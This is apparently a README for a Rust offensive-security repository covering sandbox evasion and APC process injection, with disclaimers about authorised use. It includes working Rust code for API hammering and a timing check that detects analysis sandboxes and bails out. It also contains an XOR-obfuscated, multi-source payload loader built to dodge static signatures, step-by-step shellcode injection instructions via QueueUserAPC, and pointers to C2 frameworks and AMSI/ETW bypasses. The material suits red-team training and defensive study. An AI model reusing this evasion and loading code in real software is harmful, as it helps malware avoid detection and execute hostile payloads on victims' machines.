Educational Rust implementations of offensive security techniques for authorised penetration testing and security research.
This repository contains professionally developed proof-of-concept (PoC) payloads and offensive security tools written in Rust. All code is intended for educational purposes, authorised security testing, and defensive security research.
```
RedTeamingRust/
├── src/
│   ├── evasion_payload/            # Sandbox evasion techniques
│   └── apc_injection/              # APC injection demonstration
├── docs/
│   └── wiki/
│       ├── Evasion-Payload.md      # Sandbox evasion documentation
│       └── Payload-Generation.md   # Professional payload generation guide
└── README.md
```
1. Sandbox Evasion (src/evasion_payload/)
Implementation of two common sandbox detection and evasion techniques:
- API Hammering - A tight loop of benign but expensive file I/O calls (create, write, read, delete). The aim is to burn through a sandbox's fixed analysis window and to flood API-hook-based monitoring with noise before the real payload runs.
- CPU-Intensive Prime Calculation - A CPU-bound workload that, unlike `Sleep()`, cannot be skipped or fast-forwarded. Comparing the measured time against the expected time exposes environments that accelerate the clock or patch out delays.
Features:
- Progress tracking and status reporting
- Configurable iteration counts
- Comprehensive error handling
- Detailed inline documentation
Build & Run:
```bash
cd src/evasion_payload
cargo build --release
cargo run --release
```
Documentation: docs/wiki/Evasion-Payload.md
References: Based on RustRedOps/API-Hammering
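The following is an added example, not code from this repository or from RustRedOps, showing the two primitives described above in dependency-free Rust: a file I/O hammering loop and a CPU-bound prime count measured with both the monotonic clock and the wall clock, so that a fast-forwarded system clock shows up as disagreement between the two. The function names, the scratch file under `temp_dir()`, the workload size and the millisecond thresholds are all assumptions for illustration.

```rust
// Added example (not the project's code): sandbox evasion primitives with std only.
// The scratch path, workload size and thresholds below are assumptions.
use std::fs;
use std::io::{Read, Write};
use std::time::{Duration, Instant, SystemTime, UNIX_EPOCH};

/// Trial-division prime count up to `limit` inclusive. Deliberately unoptimised:
/// the point is to burn real CPU time that a sandbox cannot skip the way it skips Sleep().
pub fn count_primes(limit: u64) -> usize {
    let mut count = 0;
    for n in 2..=limit {
        let mut d = 2;
        let mut is_prime = true;
        while d * d <= n {
            if n % d == 0 {
                is_prime = false;
                break;
            }
            d += 1;
        }
        if is_prime {
            count += 1;
        }
    }
    count
}

/// Run one CPU-bound workload and time it with the monotonic clock (Instant) and the
/// wall clock (SystemTime). Returns (monotonic_ms, wall_ms, primes_found).
pub fn timed_prime_workload(limit: u64) -> (u128, u128, usize) {
    let now_wall = || SystemTime::now().duration_since(UNIX_EPOCH).unwrap_or(Duration::ZERO);
    let mono_start = Instant::now();
    let wall_start = now_wall();
    let primes = count_primes(limit);
    let mono_ms = mono_start.elapsed().as_millis();
    let wall_ms = now_wall().saturating_sub(wall_start).as_millis();
    (mono_ms, wall_ms, primes)
}

/// Two independent anomaly checks:
///  1. the workload finished faster than real hardware plausibly allows (emulated/hooked CPU);
///  2. the wall clock advanced far more than the monotonic clock (clock fast-forwarded).
pub fn looks_accelerated(mono_ms: u128, wall_ms: u128, min_expected_ms: u128, tolerance_ms: u128) -> bool {
    let too_fast = mono_ms < min_expected_ms;
    let clocks_disagree = wall_ms > mono_ms + tolerance_ms;
    too_fast || clocks_disagree
}

/// API hammering: create/write/read/delete one scratch file `iterations` times.
/// Returns the number of completed round trips. Noisy for a hook-based monitor, harmless otherwise.
pub fn api_hammer(iterations: usize) -> std::io::Result<usize> {
    let path = std::env::temp_dir().join("hammer_scratch.tmp"); // assumed scratch location
    let mut done = 0;
    for i in 0..iterations {
        let payload = format!("noise-{i}");
        fs::File::create(&path)?.write_all(payload.as_bytes())?;
        let mut back = String::new();
        fs::File::open(&path)?.read_to_string(&mut back)?;
        fs::remove_file(&path)?;
        if back == payload {
            done += 1;
        }
    }
    Ok(done)
}

fn main() {
    let ops = api_hammer(2_000).expect("file I/O failed");
    println!("API hammering: {ops} round trips");
    let (mono, wall, primes) = timed_prime_workload(200_000);
    println!("primes <= 200000: {primes}, monotonic {mono} ms, wall {wall} ms");
    // Thresholds are assumptions: calibrate on a known-clean machine before relying on them.
    if looks_accelerated(mono, wall, 20, 500) {
        println!("timing anomaly: likely analysis environment, bailing out");
    } else {
        println!("timing looks genuine, continuing");
    }
}
```

The two clocks matter because `Instant` is backed by a monotonic counter that analysis tooling rarely touches, while `SystemTime` is exactly what a sandbox advances when it fast-forwards to defeat delay loops; a pure `Sleep()` check would only test the second.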
2. APC Injection (src/apc_injection/)
Professional implementation of Asynchronous Procedure Call (APC) injection technique for Windows.
Technique Overview:
- Creates a local thread in the suspended state (`CREATE_SUSPENDED`); a thread that has not yet run executes pending user-mode APCs as soon as it is resumed, before its start routine
- Allocates memory for the shellcode with RW (Read+Write) permissions
- Copies the shellcode into the allocated memory
- Changes the memory permissions to RX (Read+Execute), so the region is never writable and executable at the same time
- Queues an APC whose routine address is the shellcode (`QueueUserAPC`)
- Resumes the thread, which triggers APC delivery and executes the shellcode
Features:
- Step-by-step execution logging
- Proper error handling using the `windows` crate's `Result` types
- Comprehensive safety documentation
- Multiple payload loading methods (file, embedded, network)
- Modular payload loader architecture
Build & Run (Windows only):
```bash
cd src/apc_injection
cargo build --release
cargo run --release
```
MITRE ATT&CK: T1055.004 - Process Injection: Asynchronous Procedure Call
References: Based on RustRedOps/APC-Injection
Evasion-Payload.md (docs/wiki/) covers:
- Detailed technique analysis
- Performance characteristics
- Detection and mitigation strategies
- Defence recommendations
Payload-Generation.md (docs/wiki/) covers:
- Professional payload generation methods
- Why to avoid hardcoded payloads
- Multiple loading strategies (file, network, embedded, registry)
- Encryption and obfuscation techniques
- Build system integration
- Complete working examples
Payload Generation Tools:
- Metasploit Framework (msfvenom)
- Custom shellcode development (Assembly, pwntools)
- Donut (EXE/DLL to shellcode conversion)
- C2 frameworks (Cobalt Strike, Sliver, Mythic)
Loading Methods:
- File-based loading (encrypted and plain)
- Embedded resources (compile-time inclusion)
- Environment variables (base64 encoded)
- Network staging (HTTP/HTTPS)
- Registry storage (Windows)
- Steganography (LSB in images)
Encryption Techniques:
- XOR obfuscation
- AES-256 encryption
- ChaCha20 stream cipher
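An added example, not code from this repository, that ties the loading and obfuscation lists together: the payload is stored only in XOR-obfuscated form, can be fetched from three of the sources above (embedded, file, environment variable), and is integrity-checked after de-obfuscation so a wrong key or truncated file is rejected before anything could execute it. XOR is obfuscation rather than encryption; the AES-256 and ChaCha20 options in the guide would replace `xor_bytes` with an AEAD from a crate such as `chacha20poly1305`, which is why they are not shown here. The env var name, file path, key and sample bytes are assumptions.

```rust
// Added example (not the project's code): multi-source payload loader with XOR
// obfuscation and an FNV-1a integrity check. Key, paths, env var name and
// SAMPLE_PAYLOAD are constructed/assumed values.
use std::fs;
use std::path::Path;

/// Repeating-key XOR. Symmetric: applying it twice restores the input.
pub fn xor_bytes(data: &[u8], key: &[u8]) -> Vec<u8> {
    assert!(!key.is_empty(), "key must not be empty");
    data.iter().enumerate().map(|(i, b)| b ^ key[i % key.len()]).collect()
}

/// Hex encode/decode so an env var or text file can carry raw bytes without a
/// base64 crate (the guide's base64 variant is equivalent in purpose).
pub fn hex_encode(data: &[u8]) -> String {
    data.iter().map(|b| format!("{b:02x}")).collect()
}
pub fn hex_decode(s: &str) -> Result<Vec<u8>, String> {
    if !s.is_ascii() || s.len() % 2 != 0 {
        return Err("malformed hex".into());
    }
    (0..s.len()).step_by(2)
        .map(|i| u8::from_str_radix(&s[i..i + 2], 16).map_err(|e| e.to_string()))
        .collect()
}

/// FNV-1a over the de-obfuscated bytes: cheap check that catches a wrong key or a
/// truncated file. Not a MAC; an attacker-controlled source still needs an AEAD.
pub fn fnv1a(data: &[u8]) -> u64 {
    data.iter().fold(0xcbf2_9ce4_8422_2325u64, |h, b| (h ^ *b as u64).wrapping_mul(0x0100_0000_01b3))
}

pub enum PayloadSource<'a> {
    Embedded(&'a [u8]), // obfuscated bytes compiled into the binary
    File(&'a Path),     // obfuscated bytes on disk
    EnvHex(&'a str),    // hex of the obfuscated bytes in an environment variable
}

/// Fetch, de-obfuscate and verify. Plaintext is returned only if the hash matches
/// the value recorded when the payload was prepared.
pub fn load_payload(src: PayloadSource, key: &[u8], expected_hash: u64) -> Result<Vec<u8>, String> {
    let obfuscated = match src {
        PayloadSource::Embedded(b) => b.to_vec(),
        PayloadSource::File(p) => fs::read(p).map_err(|e| format!("read {}: {e}", p.display()))?,
        PayloadSource::EnvHex(name) => {
            let v = std::env::var(name).map_err(|_| format!("env var {name} not set"))?;
            hex_decode(&v)?
        }
    };
    let plain = xor_bytes(&obfuscated, key);
    if fnv1a(&plain) != expected_hash {
        return Err("integrity check failed: wrong key or corrupted payload".into());
    }
    Ok(plain)
}

/// Constructed stand-in for real shellcode: xor eax,eax ; ret
pub const SAMPLE_PAYLOAD: [u8; 3] = [0x31, 0xC0, 0xC3];
pub const KEY: &[u8] = b"k3y-assumed";

fn main() -> Result<(), String> {
    // These two values are what a build step would compute; only `obf` and `hash`
    // belong in the binary, never SAMPLE_PAYLOAD itself.
    let hash = fnv1a(&SAMPLE_PAYLOAD);
    let obf = xor_bytes(&SAMPLE_PAYLOAD, KEY);

    let p1 = load_payload(PayloadSource::Embedded(&obf), KEY, hash)?;

    let path = std::env::temp_dir().join("payload.bin"); // assumed drop location
    fs::write(&path, &obf).map_err(|e| e.to_string())?;
    let p2 = load_payload(PayloadSource::File(&path), KEY, hash)?;

    // set_var is unsafe from the 2024 edition; the block is a no-op on older editions.
    unsafe { std::env::set_var("PAYLOAD_HEX", hex_encode(&obf)) };
    let p3 = load_payload(PayloadSource::EnvHex("PAYLOAD_HEX"), KEY, hash)?;

    assert!(p1 == p2 && p2 == p3 && p3 == SAMPLE_PAYLOAD);
    assert!(load_payload(PayloadSource::Embedded(&obf), b"wrong", hash).is_err());
    println!("all three sources produced the verified payload ({} bytes)", p1.len());
    Ok(())
}
```

The reason to route every source through the same `load_payload` is that the hardcoded-payload problem the guide warns about is really two problems: static signatures on the bytes themselves, which the obfuscation layer addresses, and silent execution of whatever happened to be at the source, which the integrity check addresses.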
For All Projects:
- Rust 1.70+ (`rustup install stable`)
- Cargo package manager
For APC Injection (Windows-specific):
- Windows 10/11 or Windows Server
- Visual Studio Build Tools (for linking)
```bash
# Build evasion payload
cd src/evasion_payload
cargo build --release

# Build APC injection (Windows only)
cd ../apc_injection
cargo build --release
```
Sandbox Evasion:
```bash
cd src/evasion_payload
cargo run --release
```
APC Injection (Windows):
```bash
cd src/apc_injection
cargo run --release
```
- ✅ Comprehensive inline documentation
- ✅ Proper error handling with Result types
- ✅ Safety documentation for unsafe operations
- ✅ Professional code structure and organisation
- ✅ British English spelling throughout
- ✅ MITRE ATT&CK technique references
All projects use aggressive release optimisations:
```toml
[profile.release]
opt-level = 3       # Maximum optimisation
lto = true          # Link-time optimisation
codegen-units = 1   # Single codegen unit for better optimisation
strip = true        # Strip debug symbols
```
This repository is designed for:
- ✅ Authorised Penetration Testing - With written permission from target organisations
- ✅ Security Research - Understanding offensive techniques in controlled environments
- ✅ Malware Analysis - Defensive research and threat intelligence
- ✅ Red Team Operations - Authorised security assessments
- ✅ CTF Competitions - Capture the Flag and security training exercises
- ✅ Academic Study - Educational purposes in cybersecurity courses
This code is provided for educational and authorised security research only.
- ✅ Penetration testing with written permission
- ✅ Security research in isolated lab environments
- ✅ Educational purposes in academic settings
- ✅ Defensive security research and malware analysis
- ✅ CTF competitions and security training
- ❌ Unauthorised access to computer systems
- ❌ Deployment against production systems without permission
- ❌ Malicious software development or distribution
- ❌ Bypassing security controls for illegal purposes
- ❌ Any activity violating local, state, or federal laws
The authors and contributors of this project:
- Do not condone illegal or unauthorised use
- Accept no responsibility for misuse of this code
- Provide this material for educational purposes only
- Recommend consulting legal counsel before use in security testing
Contributions that enhance the educational value of this project are welcome:
- Additional Techniques - Implement new offensive security techniques
- Documentation - Improve guides, add examples, enhance explanations
- Detection Methods - Add defensive strategies and detection signatures
- Code Quality - Refactoring, optimisations, error handling improvements
- Cross-Platform - Extend support for Linux, macOS where applicable
- Maintain educational focus and proper documentation
- Include MITRE ATT&CK references where applicable
- Add comprehensive inline comments
- Provide detection and mitigation strategies
- Follow Rust best practices and safety guidelines
Sandbox Evasion:
Language: Rust (cross-platform)
Dependencies: rand = "0.8"
Techniques: API Hammering, CPU-intensive computation
OPSEC Level: Basic (obvious detection patterns for educational purposes)
APC Injection:
Language: Rust with Windows FFI
Dependencies: windows = "0.58"
Platform: Windows only
Technique: Local APC injection with alertable threads
MITRE: T1055.004
- RustRedOps: https://github.com/joaoviictorti/RustRedOps - Main inspiration for the techniques implemented in this repository
Frameworks:
- Metasploit Framework - Payload generation
- Cobalt Strike - Advanced C2 framework
- Sliver - Open-source C2
Analysis Tools:
- Cuckoo Sandbox - Automated malware analysis
- CAPE Sandbox - Malware configuration extraction
- ANY.RUN - Interactive online sandbox
Documentation:
- MITRE ATT&CK - Adversary tactics and techniques
- Rust Security Book - Rust programming fundamentals
- Process Injection techniques (Process Hollowing, Thread Hijacking)
- Encryption and obfuscation methods
- Anti-debugging techniques
- Syscall direct invocation
- AMSI/ETW bypass demonstrations
- Reflective DLL loading
- Linux-specific techniques
- Video tutorials and demonstrations
- Detection signatures (YARA, Sigma rules)
- Blue team response guides
- Architecture diagrams
- Performance benchmarking results
For questions, discussions, or educational inquiries:
- Review the comprehensive documentation
- Study the RustRedOps project
- Consult security research communities and forums
- Engage with authorised security training programmes
This project is part of an educational security research initiative. All code is provided for educational purposes under the understanding that users will:
- Obtain proper authorisation before testing
- Use tools responsibly and ethically
- Comply with all applicable laws and regulations
- Not engage in malicious activities
Current Version: 0.1.0
Last Updated: 2025-11-26
Rust Version: 1.70+
Status: Active Development
Special thanks to:
- João Victor (@joaoviictorti) - For the excellent RustRedOps project that inspired this work
- The Rust Community - For creating a memory-safe systems programming language
- Security Researchers - For advancing the field of offensive security research